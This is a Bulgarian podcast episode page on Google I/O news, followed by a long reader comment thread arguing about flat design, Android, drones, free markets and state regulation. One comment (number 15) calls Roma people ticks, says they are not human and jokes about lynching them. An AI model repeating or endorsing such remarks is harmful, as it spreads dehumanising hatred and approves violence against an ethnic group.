Епизод 37

Част 1 – обзор на новините

 

Директен линк към част 1 (mp3) (ogg)

TuxCon е тази събота!!!

Днес основно ще си говорим за Google I/O, какво ново, какво старо, какво еднакво. Накрая вмъкваме малко „старнични новини“.

| юни 26th, 2014 | Posted in Uncategorized |

277 Responses to “Епизод 37”

  1. Мидвес Караколаксъзов Коджабашгюлмезов Says:

    авааа аркадашлааар … туй предване: “ С БЪКЛИЦА И ДРЯН С БАЙ ИВАН И ДРУГИЯТ ЗАСМЯН “ много ма кефи ееей !!! ама бян не вижда де е проблема, имаш Win Xp + Нокийка Банан, и нямаш грижи ва каенчооо … никой няма проблеми … проблеми йок ва, НЕРДЕ ЯМБОЛ НЕРДЕ СТАМБУЛ … КАК КЪДЕ ВААА ИВАН АГА, С ПЪРДЕЛ И ГРОХОТ НА МОМИН ПРОХОД!!! ей там е вааа … лайф стайла на Българина не е като на ХахахаМериканците ва … аннадъм му ??? та няма проблем ни с Гугъл ни с Андроида … джиткаш с стара техника и си ЧОК ГЮЗЕЛ БЪЛГАРИСТАН АРКАДАШЛАР 🙂

  2. Фьт Дхюс Says:

    Байко, претендирам да поназнайвам нещо малко български, ама от твоето изказване нищо не разбрах. Хайде, ако обичаш, върни се и приведи малко в ред и малко по-смислено мнение, та да можем и ние да отвърнем нещо. Ако искаш де, ако не да не се беше хабил.

  3. Sfolter Says:

    Гугъл от извествно време почнаха да използват плосък дизайн, както и Майкрософт, както и много други, демек като цяло се избягват (или се използват много пестеливо) градиенти, сенки, бевели и излишни ефекти. Ако си спомняте преди логото на Гугъл беше със сянка, имаше и някакъв бевел май? Сега всяка буква е един солиден цвят и целия дизайн е опростен с прави изчистени форми. Затова е и приликата с Уиндолс 8, просто няма как да не си приличат след като използват един и същ дизайн модел.

  4. Stilgar Says:

    Да. Дизайн моделът, който MS започнаха през 2008 и интегрираха във всичките си продукти докато феновете на Google и Apple им се подиграваха 🙂

    Ти прави сметка ако MS го бяха направили това – щеше да има истории как е „откраднат“ и колко са бездарни и как нищо не могат да измислят.

  5. Сол Says:

    Пичове свободен пазар не е имало, няма и никога няма да има, защото естественото състояние на пазара е да натрупва капитал и да създава монопол. Разбирам, че всички сме промити в малка или по-голяма степен от бруталната пропаганда последните 25 години, но се радвам че Иван прави своите коментари на точните места.

    „Растежът заради самия растеж е идеология на раковата клетка.“ Edward Abbey

  6. Stilgar Says:

    Явно имаме различни дефиниции за свободен пазар. Мойта е държавата да не му се меси.

  7. Сол Says:

    Държавата в сегашната система се състои от абсолютно същите хора които ти държат това което ти наричаш свободен пазар. Ролята на медиите е да поддържат тази заблуда. Държавата по конституция трябва да е суверена, но масовата пропаганда е направила така, че вместо хората да роптаят срещу йерархията и изолирането им от участие в политическите процеси да искат да елиминират собствената си защитна черупка от глобалната корпоратокрация. Аз имам един въпрос, представи си, че държавата утре я няма, как си представяш твоя личен живот и този на близките ти? Какво ще се промени, какво няма да се промени, с две думи или с три ?

  8. Stilgar Says:

    Еми ще си купя пушка 🙂

    Иначе съм съгласен, че няма свободен пазар, все се бута държавата да регулира.

  9. wpich Says:

    Аз също много се дразня от смученето на лични данни от страна на Гоогле, но са много голям монополист и който иска да ползва някоя от услугите им си плаща … скъпо с лична информация.

    Една заб. относно изключването на всички Гоогле апликации, казвате че не може, но не е така – влизате в апп менижъра и давате Disable на която апп искате. Аз съм със стоков андроид 4.3 и съм Disable-нал всички шитни които не ползвам на Google и абсолютно всички добавени приложения от Самсунг (Общо 41 махнати) и проблема е решен – не са активни, няма ги в менюто, не заемат рам и телефона лети.

    Сега проверих Google Play Store може да се мехне.

  10. thd Says:

    За тоя дрон със сигурност са объркали нещо цифрите. С някаква пуцалка за paintball е въоръжен 4000 няма да да се хванат. Иначе в България ако го пуснат, ще им го откраднат и до там. По добре да не го изкарват въобще 🙂

  11. thd Says:

    Ахаа намерих го 🙂 с 4 пушки за paintball е 🙂 http://www.prisonplanet.com/riot-control-drone-to-shoot-pepper-spray-bullets-at-protesters.html

  12. taniiak Says:

    Дрони ще ви хранят http://vbox7.com/play:42e415fba5
    дрони ще ви трепат.
    Това е бъдещето. 🙂

  13. Stilgar Says:

    Бъдещето е супер!

  14. Кирил Says:

    „Аз имам един въпрос, представи си, че държавата утре я няма, как си представяш твоя личен живот и този на близките ти? Какво ще се промени, какво няма да се промени, с две думи или с три ?“
    Спрямо сегашната ни държава живота ще стане много по-лесен. Аз не знам една сфера на живот където държавата да не се е намесила и да не е съсипала всичко.
    Интернет – имаме добър интернет защото държавата не се е намесила там. Какво направи държавата – започна да маха кабелите, за да може няколко монополиста да няма конкуренция и да си правят каквото си искат. Какво друго направи държавата? Ами иска да ни след в интернет всичко което правим.

  15. thd Says:

    Добре ще дойде да не се плащат данъци и осигуровки. Колкото до проблемите дето полиция и съд трябва да ги решават и без това на тях не може да се разчита… Е както дивия запад „ахаа конекрадци – ей там е дървото, люш и айде“ и тука мангасите трябва тъй да се почистят, иначе оправия няма. Французите дето много лаеха „интегрирайте ги , интегрирайте ги“ като им се изсипаха там и им изядоха ушите, после земите си ги … Що не ги интегрираха във франсето незнам, специалисти хора по интеграциите. И не това не е расизъм , щото те не са хора 🙂 те са кърлежи само.

  16. Кирил Says:

    „Доставката на пица чрез дрони – само за първият уикенд бяха направени повече от 6“. Те направо са избили рибата!
    Но как ще платиш? Аз например ако съм нов клиент и искам да ми доставят пица и има банкнота от 20 или 50 лева какво правим?
    А и с тези дронове ще е като на селския фестивал – с пушка целиш движеща се мишена и ако оцелиш получаваш награда.

    Аз предлагам политиката да се ограничи до технически решения – интернет, покупка на софтуер, данъци за софтуерни компании и т.н. Иначе ще стане мазало…

  17. някой Says:

    За информация на стилгар – когато спрат по мощните държави да се бутат да регулират нашата, само тогава можеш да искаш нашата да е само наблюдател, в противен случай си обикновен слуга, но откакто ти чета писанията, ти нямаш нищо против да си точно това и винаги си твърдял че предпочиташ да сме колония на щатите. Така че както и да си маскираш претенциите си подвластен точно на държавата, само че чуждата, което е още по-зле.

  18. бацето Says:

    @Сол много съм съгласен с теб. В природата има баланс, защото целта на лъва не е да избие всички антилопи, а да се нахрани. След като задоволи глада си прекратява лова. При корпорациите такъв баланс *няма*. Целта е тотална хегемония, *монопол*. Разбира се, държавата/законите могат да бъдат както градивни (качесвено регулиране и поощряване на свободния пазар и бизнеса), така и деструктивни (корупция, поощряване на монопола, смазване на малкия бизнес, диктатура …).

  19. Кирил Says:

    @някой случайно американците да напират кабелите за интернет да са ни под земята? За следенето в интенет американците ли ни натискат или нашата държава задължава операторите?
    Американците ли натискат майка ми да плаща патен всеки месец за това, че работи и американците ли я глобиха с 200 лева защото няма работно време на вратата си?
    @бацето законите могат да бъдат градивни, също както ти можеш да бъдеш милиардер, но какви са шансовете тези неща да се сбъднат? Например в нашата мила родина получаваш данъчни облекчения само ако си голяма фирма – минимум 50 човека. Естествено за малкия и средният бизнем вместо тези облекчения имаш данъци. Това ако не е смазване на малкият и среден бизнес не знам какво може да е.

  20. някой Says:

    @Кирил, изясни си сам на себе си какво искаш да напишеш, защото това което си написал няма никакъв смисъл. Проблемът е че всеки дърпа на някъде като орел, рак и щука, особено по мощните държави, а всеки прехласнат дали по щуката, рака или орела дрънка глупости как не трябвало да се меси държавата докато се намесва чуждата. И да ти отговоря на глупостите – да американците натискат за повечето от нещата които си писал и аз твърдя че го правят не само нелегално но и незаконно защото винаги когато имат юридически казус нелегалното минава в легално за техен интерес и после го налагат на другите под разни форми на международни „правила“ и „споразумения“ и „спогодби“ Дори Обама му се наложи да салага вето на собственият си съд за да може определена корпорация(Apple) да си продава продуктите в щатите, ето това е „свободният пазар“ който стилгар идолизира.

  21. Сол Says:

    Бацето, Кирил, тук се връщаме на един по-стар урок за класите. Държавата винаги е инструмент на господстващата класа, от там и всички последствия. В тоя смисъл един друг въпрос, защо свободния пазар не допуска да се изучават в училище/университет алтернативни икономически системи на неолиберализма ? Сиреч, не искаш да говориш за неолиберализма няма хонорар, да се изразя по-ясно. Изключенията в щатите се броят на пръстите на едната ръка…

  22. Stilgar Says:

    Никой хора тук ги преследват американци. Разбирам американците да искат някакви макроикономически неща, да искат да копаме шистов газ (те искат) или да отглеждаме ГМО ама да смяташ, че разните чиновници в ХЕИ, милицията и разни комисиики са американци или че действат по нареждане на американците е смешно.

    Отделен въпрос, че аз говоря по принцип за страните. То в момента в САЩ е по-голям цоциализъм и от тук. Тук поне си имаме някаква доза здравословна анархия.

  23. Сол Says:

    Стил, някак не е редно да се използват дефиниции за системи без основополагащите им принципи като… липса на частна собственост на средствата за производство ? Политически и икономически системи са две коренно различни неща, нищо че се преплитат през цялото време…

  24. някой Says:

    @stilgar я обясни за смехотворните ми твърдения че милиционерите са подчинени на офисите на ЦРУ и ДЕА (а те както знаем са чисто български)(да не споменавам тайни затвори някъде другаде). Чиновницните в ХЕИ май първи ще те ваксинират срещу новият вид грип за които е смешно известно че лобистите на европейските фармацевтини компании в щатите и тези на оръжейното им лоби са едни и същи, по същият начин ще лобират Е999 да е разрешено само тук от целият ЕС. Да смешно е защото звучи като теория на конспирациите, нали това е целта, да не им се обръща внимание на тези неща, затова се и пускат допълнително глупости като chemtrails да може всичко да се слага под общ знаменател и да се игнорира. Ненамесата на държават в малка страна като нашата , на кръстопът с всякакви чужди интерси е утопия. Та ти не можеш да се справиш с вноса и дъмпинга само на домати и ябълки от съседните страни без регулация(да не споменавам нееднаквите субсидии и умишлената липса на контрол с цел угаждане на трети страни) Какво остава за някакъв технологичен сектор или сектор на услуги където по подразбираме тръгваме изцяло зависими и някой да апелира че акоимаме собсвен интерсе това не било свободен пазар.

  25. Stilgar Says:

    Значи според мен милицията в БГ е руска обаче така или иначе на който и да е не вярвам те да са им казали да направят вечерен час за лица под 18 години и да ходят да глобяват за щяло и нещяло. Също така мен от ХЕИ никога не са ме ваксинирали и не мисля, че ваксинират изобщо който и да е, но пък съм сигурен, че и те са ме глобявали за глупутки (2 тоалетни на бизнес с 6 места искаха).

    А между другото дъмпингът си е валиден похват на свободния пазар. Свободен пазар означава единствено нерегулиран, не означава без монополи или без дъмпинг.

  26. thd Says:

    @Stilgar е тука едно старо ама яко по повод тоалетните 🙂

    http://www1.mediafire.com/imgbnc.php/1aaf5e80930f9d52b948a135f3ddab87336eee03c686a327f0f2df7d3a7160005g.jpg

    а ето едно друго яко дето го намерих случайно докато търсих първото

    http://q8allinone.com/wp-content/uploads/2013/06/Emperor-1510-LX-High-Tech-Computer-Workstation.jpg

  27. някой Says:

    Stilgar ами не си прав ама никак. Хайде от зад напред. Не си ти човекът който ще даде определение на свободен пазар. Монопола ако е на държавно предприятие тогава пак ли е свободен пазара или си ги тълкуваш както си искаш. Недей да делиш на някакви частни тълкувания според както ти е удобно за да се изкарваш прав, всеки знае за какво става въпрос. Никой с всичкия си няма да защитава чужда дъмпингова политика за сметка на родното производство, какво се опитваш да ги извърташ?!?Ако си от тези тарикати които предпочитат нелоялната конкуренция и липсата контрол напълно заслужаваш всеки ден да ти правят проверки и да те глобяват. Аз ако бях на ХЕИ не 2 а 4 тоалетни щях да ти искам особено при липса на обществени такива, и затова че не искаш държавата да се меси особено там където трябва.

  28. Stilgar Says:

    Прав си, не съм аз този, който ще даде определение. Представи си, че като казвам „свободен пазар“ казвам „пазар без регулации“, ако така ще си по-спокоен. По принцип на теория може да има държавен монопол в свободен пазар, но обикновено това което става е, че държавата променя правилата за да е изгодно на монопола. Ако държавата не променя правилата и даде гаранции, че няма да го направи тогава може да има пазар с държавен монопол. Не че знам кому е нужно държавата да прави каквото и да е с търговски характер, че и да го монополизира.

    Нямам нищо против да ям турски домати на ниски цени за сметка на турските данъкоплатци, благодаря. Да правят повече дъмпинг ако може!

    Не се притеснявай, аз съм се погрижил да не ми правят проверки и да ме глобяват. Закрих бизнеса, уволних хората и спрях да плащам данъци, такси и наем. От тогава работя за други хора и ми е много хубаво. Най-често продуктите, по които работя не са за България, а за няколко години работих за компания регистрирана в USA и плащаща данъци там (нищо, че половината собственици бяха българи).

  29. някой Says:

    ето от уики в случай че някой се заблуди докато ни чете – „В практиката не е възможно функционирането на пазар без никаква регулация, но единствената законова принуда се осъществява от държавата. Тя се намесва чрез налагането на данъците и таксите, контрол на цените на определени стоки, антимонополно законодателство, определени мерки за защита на потребителите и др.“

    Не се притеснявай не си единственият който обвинява държавата заради непознаването на законите, наредбите и пазарните механизми, смешното е че е малко като правилата за движение по пътищата- навънка всеки ги спазва ама тук се опитва да мине метър и вини всички други само не и себе си. То и затова се радваш на другите домати.

  30. thd Says:

    @някой, ти нямаш идея явно какви ъпсурдистански изисквания има тука за някои неща, дето уж ги изисквал европейския съюз, пък в другите държави на европейския съюз, даже не са ги и чували и са направени само и специално за глоби.

  31. Stilgar Says:

    „В практиката не е възможно функционирането на пазар без никаква регулация, но единствената законова принуда се осъществява от държавата. Тя се намесва чрез налагането на данъците и таксите, контрол на цените на определени стоки, антимонополно законодателство, определени мерки за защита на потребителите и др.“ Citation required

  32. Кирил Says:

    @някой кажи един сектор или отрасъл в който държавата да се е намесила и да не го е съсипала тотално? Кажи един…
    Тези ваксини които ги споменаваш случайно да са задължителни от нашето правителство? Нашите депутати са решили да са задължителни. В този случай държавната намеса дали решава проблеми или точно тя го е създала?
    Ами тези chemtrails за да се пръскат нашата страна трябва да се съгласила в някакъв договор – за НАТО, за ЕС, протокола от Киото… със сигурност някой някъде нещо е подписал.

    „Та ти не можеш да се справиш с вноса и дъмпинга само на домати и ябълки от съседните страни без регулация“ То защото сега държавата успява да се справи с дъмпинга от съседни страни и в магазините е пълно с българска селскостопанска продукция.

    Да кажем, че аз имам пари и намеря човек на село, които може да произведе нещата, които искам. Ами той ще има проблеми, защото първо ще му се иска от държавата да плаща данъци, второ ще му се искат някакви документи за продукцията, трето ще му се иска да си регистрира фирма, четвърто ще трябва да се съобразява с глупави държавни регулации като колко трябва да са извите краставиците, черешите трябва да са с дръжки и всякакви други бисери на бюрократичната мисъл. Отделно остава въпроса, че на този човек по всяко едно време може да му изпратят инспектор и да му наложат глоби за глупости. И в крайна сметка правителството съсипва работата на човека, за да ги защити от американското правителство и дъмпинга от съседни страни?
    А последната страхотна държавна намеса – за да продаваш продукция от един сорт той трябва да е регистриран. Не мина, но тази държавна намеса как щеше да помогне на българските производители.

  33. някой Says:

    Ама вие сериозно имате някакъв проблем. Никой не е казал че всичко е идеално особено с преход от една икономика към друга. Това съвсем не значи че трябва да продадем всичко и да се оставяме други да ни командват, а от това което пишете ми става ясно ,че нямате даже базови познания по икономика, но претендирате да имате нещо повече и то на базата на горчив опит от който не сте се поучили. Аз много се радвам да прочета че вас ви командват защото вие не сте разбрали как да го правите, но не искайте всички да са като вас, нито пък да вините държавата затова че не сте успяли да играете по правилата и да остоявате своите интереси и за по-лесно се кланяте на чуждите. Сива икономика, прекупвачество, ниски изкупни цени, конкуретноспособност, качество, разпределие на труда и т.н. за всичко това че не можете да го схванете е виновна собствената ви държава понеже се опитва да ви го наложи, но го хвалите когато е наложено от чуждата

  34. thd Says:

    @някой, например на едно смешно заведение, дето да продава сандвичи, не някаква по голяма кухня, знаеш ли колко мивки му искат да има ? Да ти кажа – минимум 7 словом (седем). Ти занимаваш ли се с нещо или просто в момента си в някоя гимназия в която се изучава икономика и учебника ти е пресен ?

  35. Кирил Says:

    @някой Аз виня държавата затова защото, че ми пречи! Пак ще те питам кажи ми една област в която държавата да се е намесила и да не е осрала орталъка? Кажи една и след това вече говори за принципите на икономиката колко си искаш.

  36. Сол Says:

    Държавата така или иначе няма да я има като понятие до 30 години в световен мащаб. Това обаче далеч не значи, че няма да има контрол и репресии на господстващата класа над останалите, просто служителите на реда ще бъдат изцяло частно наети в това чистло и армии което е видно и при събитията днес.

    Същите които сега засилват роботронната революция с единствена цел печалба в крайна сметка сами ще сложат край на частната собственост. Пазарна икономика без платежоспособна класа от консуматори е обречена, а роботизацията ще фиксира именно това положение.

    Като доказателство ще приложа доклада на Окфсам, че 85 човека притежават богатство колкото 3.5 млрд към момента.

    http://daniivanov.blogspot.com/2014/01/85.html

    А като по-обстоен материал – краят на държавата и капитала

    http://www.savanne.ch/svoboda/anarchy/theory/robotron.html

  37. някой Says:

    @ thd не познавам изискванията специално за заведения за бързо хранене и доста ме съмнява че е точно така както си го написал, но дори и да е така аз съм с 2 ръце за. Хигиенните изискванията и манталитета в общесвеното ни хранене са на такова ниво, че се нуждаем не само свръхмерки но и ежедневен контрол по тях. В противен случай отиваш към продаване на месо на ченгел на улицата , а някой по на високо, със същото мислене внася 70 годишно консервирано конско от другият край на света. От управленска гледна точка ако санитарните изисквания те събарят – означава 2 неща – първо че не ги познаваш и не си ги предвидил, второ че нямаш достатъчно капитал да развиваш търговска дейност и при най- малкият полъх ще паднеш и ще виниш я държавата я конкуренция или нещо друго.

  38. thd Says:

    @някой, ти сигурен ли си, че някой не ти плаща да пишеш идиотска пропаганда в интернет ? Седем мивки за хамбургери сериозно ли смяташ че е нормално ?!?!?! Ако не ти се вярва провери изискванията, има ги в интернет. Провери и за фризьорски салони какви глупости има и за други работи. В никоя държава в ЕС ги няма тия изисквания. В ьентъра на лондон продават в колички какви ли не неща , ход-дог и др без да имат 1 мивка! Пак питам ти сериозно ли смяташ 7 мивки за нормално ?

  39. някой Says:

    @thd ами ти си писал за заведение и за кухня, тоест там където се приготвя, а не само продава, отделно че избягваш сам от примера си,тези изисквания които са тук трябва да се спазват , а не тези в Лондон, които вероятно се различават както от европейските, така и от нашите и аз твърдя че и тях не познаваш. И да сериозно смятам че някой по-компетентен е имал повече основания да ги напише тези изисквания отколкото този който си мисли че ще мине метър с прекупвачество и ниско качество, но с лондонски претенции, отделно че и там си имат проблеми и даже сега като погледнах на доста места пише че изискванията са доста по строги , но и там не се спазват.

  40. Sfolter Says:

    @thd това доста невероятно ми се струва, но не и невъзможно. Аз намерих една наредба от 2002 г. (има ли по-нова?).
    http://goo.gl/JKBThT

    Ето това пише за мивки:

    Чл. 18. В производствените помещения на подходящи места се осигуряват мивки за измиване на ръцете с топла и студена течаща вода, миещи и подсушаващи средства, а където е необходимо – и средства за дезинфекция на ръцете. На всеки осем работници се осигурява най-малко една мивка.

    Иначе в повечето заведения и мивките в тоалетната да броя пак няма да излезнат 7 😀

  41. thd Says:

    Аз го знам от няколко човека дето имат заведения. Искат им мивка за зеленчуци, мивка за месо, мивка за риба и тн за всяка простотия по отделно искат го от РЗИ без значение примерно че не предлагат риба. За фризьорка и маникюристка на 15 квадрата площ им искат 3 мивки … наредбите и законите са написани с цел подпомагане на корупцията и/или глобите.

  42. Stilgar Says:

    Просто да ви го обясня @някой е против дребния бизнес и смята, че държавата трябва да го стъпче. Тя и успя, само дето не знам защо от това не съм нещастен аз, а някви хора дето мрънкат, че няма работа и пари за пенсии. Аз си бачкам на заплата при западните империалисти и си купувам дъмпингови турски домати и си щракам с пръсти.

  43. някой Says:

    Аз не съм против дребният бизнес стилгар, но си има правила, съгласен съм че държавата смачка дребният бизнес и то защото не успя да наложи тези правила да се спазват, нямаше никакви гъвкави политики имаше само псевдореформи и шокови налагания на неща които самите управляващи не ги разбираха, отделно има масово активисти като теб които са против българският интерес с тези агитации за „свободен пазар“ под формата тотална разрпродажба, безхаберие и никаква регулация или защитни механизми както и „добрият дъмпинг“. И когато дойдоха дори не най-големите чуждестранни фирми се оказахме неконкурентноспособни и сега продължаваме да виним „големият контрол“ и „регулациите“ при все че такива не имало от повече от 20 години.

  44. thd Says:

    Не само дребния бизнес. Цялото производство също.

  45. Stilgar Says:

    А така. Аз сега за да мога да плюя спокойно вече нямам бизнес и не ме интересува какво ще направите регулаторите. Само ще гледам сеира, а ако го направите да не може да се работи и за износ ще се изнеса.

    BTW забраната за пушенето на обществени места и тя е голяма простотия (все пак след последните промени поне ресторантите не са изключение, така че последната поправка е по-малкото зло).

  46. thd Says:

    http://www.youtube.com/watch?v=jQCXhZS1sqw за политиците 🙂

  47. някой Says:

    Ами стилгар аз не знам в макдоналдс да е разрешено да се пуши, но за сметка на това имат изискване на колко градуса на им са топла и студента водата на мивките и точно тези изиквания съвсем не пречат да се бутат на някакви „екзотични“ места, където половината им от масовото меню е забранено със закон и доста се съобразяват ако искат да съществуват там.

  48. Stilgar Says:

    Ами не се пуши в McDonalds щото така са решили собствениците за собствения си частен бизнес, а не щото някой ги е накарал. За протокола аз не пуша и димът ме дразни и все пак не виждам що държавата трябва да ми го прави да не се пуши. Аз тъп ли съм да не мога да разбера къде се пуши и да не ходя където се пуши? Айде благодаря, ама няма нужда.

  49. Фьт Дхюс Says:

    Не мога да приема мисленето, че като няма да пращаме роботи да убиват хора, трябва да пратим други хора да ги убиват. Изобщо не трябва да пращаме някой да убива някой.

    И тия хорица другите не за сефте протестират. И според мен имат адски основания. Бил съм в подобна позиция. Аз съм от Видин. Видин беше най-скъпият град през деветдесетте, защото много хора се замогнаха от контрабанда. Но тези, който не бяхме контрабандисти много страдахме от това, защото нашият бюджет беше между 10 и 20 пъти по-малък от техният.

    Да спомена и за фермата. Тя вече не е актуална. Беше много модерна през осемдесетте (седемдесетте няма как да помня), защото съвсем на живо виждахме, колко пророческа беше. Интересно защо я имаше издадена у нас. Не беше сгрешила в нищо. Но всичко това вече е минало.

    Сега същата роля изпълнява 1984, само дето е сбъркал датировката.

    Да спомена, че не всички новини казахте. На мен най-голямо впечатление ми направи XSecureLock, но от Вас очаквах нашироко да обсъдите Cayley. Предполагам, че най-малко си заслужаваше поне споменаване, че Хромбуците вече няма да са толкова безполезни, като ще могат да пускат андроидски приложения. Само, че въпроса е, защо да не си купиш китайски лаптоп с Андроид, който ще ти е много по-тънко в парите.

    А пък от Стил очаквах да спомене с нескрита гордост за инструментариума на ООХМЛ, щото видите ли не сме толкоз зли, не сте само Вие отворените. По между другото според мен, това е отговора им на новината, която споменахте от Гошо за документните процесори.

    Не чух в предният или този епизод да казвате, че телефона на Мозила се е появил в Индия, което не е кой знае каква новина, но си заслужава отбелязването. Може и да сте казали, ама съм дърт пергиш и не помня.

    Като споменах това, за разлика от Гатьо, аз смятам организатора на задачи от Гошо за полезен. Веднага декларирам, че не бих си купил телефон по-умен от мен и специално този организатор не бих го ползвал. Ако ще имам такова приложение, то трябва да е при мен и да не ме порти на кораба майка.

    Защо го смятам полезно? Защото за мен организацията не е три секунди работа. Отнема ми време и усилия, които мога да вложа в друго. Разбира се, ако някой е перфектно организиран и подреден, евала му. За мен това е мъка. А като науча, че трябва да пътувам някъде, ми припада мъка. Нищо, че на ден минавам най-малко 60-70 километра.

    Не искам да мисля за странични неща. както не искам да имам странични ефекти в програмите си. Последното е безумие, защото страничните ефекти са единствената причина програмите да съществуват. Но идеята ми беше, че страничните неща, ме отплесват от основното и ми губят стотици пъти повече време, от времето, в което съм мислел за тях. Практически доказано поне при мен.

    Ако има и други хора, които страничните неща им пречат, то това някой друг да мисли по тях, вярвам също, ще им е полезно. Просто нямам толкова много мозък, че да мисля и за тях. Предостатъчно ми е другото.

    И последно, което казахте първо. Аз новият Андроид 5 не съм виждал дори на картинка, камо ли на клип. Нямам и желание. Това не е моето нещо. Но само като почнахте да обяснявате, какво представлява и веднага си казах Метро. Щом само по първите няколко думички, аз се сетих за Метро, е учудващо, че някой, който го е виждал, няма да направи асоциаццията. И съвсем очевидно, е съвсем нарочно. Въпроса е сега едни хора дали ще съдят други хора. Едни съвсем трети хора съдиха вече едни четвърти хора за плагиатсване на ГПИ и доколкото помня спечелиха. Не вярвам тези първите хора да изпуснат шанса си срещу онези вторите, след като имат нагледният пример на онези третите и четвъртите, дето също са им преки конкуренти на същият пазар.

    Тук щях да се гавря, че някой хора не могат да слязат в долният клас, защото всичко дето правят е сбъркано по начало. Ама ми се струва излишно. Нищо положително няма да излезе от това. Всеки си има негови разбирания. А и компаниите няма да вземат да се променят за това, че разбираш ли, някой смята, че грешат.

    Ей да онова за хората забравих. Това да слушаш хората, не винаги е добро. Същото е например и ако го пренесете при работодателя си. Шефа Ви слуша ли, какви акъли му дават служителите? С кои от тези акъли сте съгласни, на кои служители? Какъв е резултата?

    Не всеки даден акъл е добър, дори да е даден с най-добро пожелание и от някой, който наистина много му пука, че на всичкото отгоре и много разбира. Защото не винаги подчиненият (или потребителя във вашият пример) има представа от пълната картина. И не винаги неговите цели отговарят напълно на целите на шефа. Не изключвам обаче целите на шефа (доставчика) да са грешни, намеренията му да са грешни или самият той да греши.

    И не винаги лошият резултат е действително лош от друга гледна точка и добрият е добър. В икономическите ВУЗ-ове има една дисциплина: Планиране и прогнозиране. Тя е най-трудно усвоимата. Не се и обръща много внимание на нея. Почти със сигурност мога да твърдя, че почти няма хора да са я усвоили, дори сред тези, които са я завършили като специалност. И прекалено често виждам резултатите от самоделното планиране.

  50. Фьт Дхюс Says:

    А ДА ЗАБРАВИХ ОСНОВНОТО!!!

    ЕПИЗОДИТЕ СА ПРЕКАЛЕНО КРАТКИ НАПОСЛЕДЪК!

    Викането не е заради изпуснато копче за горен регистър.

  51. Stilgar Says:

    За OOXML SDK-то не помня дали бях видял новината като записвахме. Ако не се лъжа е само за .NET, а и досега го имаше безплатно. Иначе по една случайност точно миналата седмица работех с него за първи път. Знам го от 2008, но досега никога не е имало изисквания които да позволяват да се поддържат само OOXML форматите. Винаги са ни искали да поддържаме и старите, а за тях няма SDK и правихме едни безумия с Office.Interop… направо се родих с това SDK.

    Колкото за тея хора дето ще съдят онея хора… ами то нищо не се променя. Към момента всички, които правят Android плащат на първите хора, така че няма проблем – те вече са си платили.

  52. Фьт Дхюс Says:

    А Ве като китайците ипортиха списъка с патентите, не се знае дали няма да почнат да ги оспорват и много народ да се отърве от плащане. И например никак не съм сигурен, че всички плащат и сега. Например киайският гаражник ХТМ (да бе сериозно, не е ХТЦ, а ХТМ и десетки подобни), дето продава с безплатна доставка по целият свят от безброй китайски портали преведени на безброй езици.

  53. Фьт Дхюс Says:

    Уф, че съм мега тъп. Предните ми коментари са били спряни за модерация, защото съм ги подписал с друга поща. Ама понеже духчето ми спира пиявиците и не съм видял, че граватара не ми се показва, че да се сетя, каква глупост съм сътворил.

    ––––––

    A-a-a в тази тема се заговори за Икономика, а икономистите наоколо сме малко. Ще взема да се изкажа.

    По ред на номерата. Не се съгласявам със Сол.

    (Сол това от подправката ли е, ключа ли, съкращение от името на звездата ни или нещо друго? Интересно ми е.)

    Да целите на компаниите са понякога да вземат целият възможен пазар. Само да направим уговорката, че не винаги това им е целта. Подразбиращата се цел на всяка компания трябва да е печалбата и едва тогава нещо друго. И това, че на основни участници на пазара, целта им е да го завземат, не означава, че това е цел на самият пазар като такъв. Големият често не може да заема ниши, тези ниши остават за конкуренцията.

    Но да предположим, че някой играч на някой пазар е успял да го заеме целият. Какво се случва? Можете да предполагате, каквото желаете. Че ще влоши качеството, че ще вдигне цените, ще спре иновацията, нещо друго. Добре нека е така. Всички сме го виждали. Гот е да сме монопол.

    Но самият факт, че във всеки един момент, може да му се появи конкурент, прави монополиста несигурен. Докато е сам добре, но в момента когато има конкурент, вече не е сам.

    От друга страна конкуренцията не винаги е нещо добро. Всъщност от макроикономическа гледна точка е лошо. Защо? Ще го представя с условен пример. Имаме двам конкуренти и само един пазар. Както и да се разпределят дяловете на тези двамата, винаги половината продукт остава нереализиран. Това са загубени ресурси. Сиреч конкуренцията е друго име за неефективност.

    Примера ми беше идеалистичен, в реалността не е точно така, както можете да се досетите. Но винаги, при всички положения и всички случай конкуренция значи неефективност.

    И да, колкото и да ми е мъчно, прогнозата, че след 30 години няма да има държави изобщо не е вярна и няма как да се случи на практика. И след триста и след три хиляди години държави ще има. Ако имаше тенденция да изчезнат държавите, те щяха да се разпадат. Но се случва точно обратното. Наднационални съюзи се роят непрекъснато. Само преди дни се роди ЕврАзис. Сиреч държавите засилват ролята си, а не намалява.

    И господстващи класи винаги ще има. Ние българите поне трябва да го знаем. Опитахме се да изградим безкласово общество и дори то имаше господстваща класа, не беше безкласово. А докато има господстващи класи, ще има и държави, те взаимно се обслужват. Винаги така е било и ще бъде.

    Връзките дето си дал, не се сърди, че няма да прочета. Но имай предвид, че липсата на собственост, означава именно липса на собственост. А като няма собственост, няма и организация. При едно такова положение изобщо не може да става въпрос за икономика. То дори за общество не може да става въпрос.

    –––––

    Нашият стар другар Кирчо пита, как си представяме живота без държава?

    Сега тук съм в неизгодна позиция, защото това не е въпрос, на който науката е дала отговор. Възможни са и двете ситуации и двете ситуации не е непременно да водят апокалипсис. Могат да съществуват и са съществували и в бъдеще ще съществуват. Всичко е до личният избор на човека.

    Какво е личното ми убеждение? Ами тук без бой си казвам, че годините общуване със Стил по форуми и други места, са си дали отражение. Преди години не бих отговорил така, но днес повлиян от него (в смисъл, че първо от него съм виждал подобна теза, а после съм си правил свой проучвания и съм стигал до свой изводи често различни от неговите), бих казал, че предпочитам държава да няма.

    Държавата може да бъде добър стопанин, може да бъде и лош според конкретният случай, но това е горе-долу единственото положително, което виждам в нея. Регулацията няма добри последици, когато не държавата е собственик на производителният ресурс. Но също така, там където държавата не регулира, не бива тя да поема последствията от действия или бездействия на участниците на съответният пазар. Защото това също е намеса.

    Регулацията е тази, която ражда монополите. Без регулация, монопол не може да съществува. Сами по коментарите давате примери, как държавната намеса дава преимущество на големият пред малкия, защото големия е този, който ще успее да изпълни новото изискване.

    Тук обаче има въпрос, по който кардинално се разминавам със Стил. Спомена го мисля Тхд. Какво става с осигуровките? Ако аз съм предприемач, такива не ми трябват. Ще работя докато съм жив или поне парите ми ще работят за мен и след като се оттегля, ако съм бил достатъчно пресметлив. Но стигна ли до оттегляне поради старост, то най-вероятно ще съм бил достатъчно рационален.

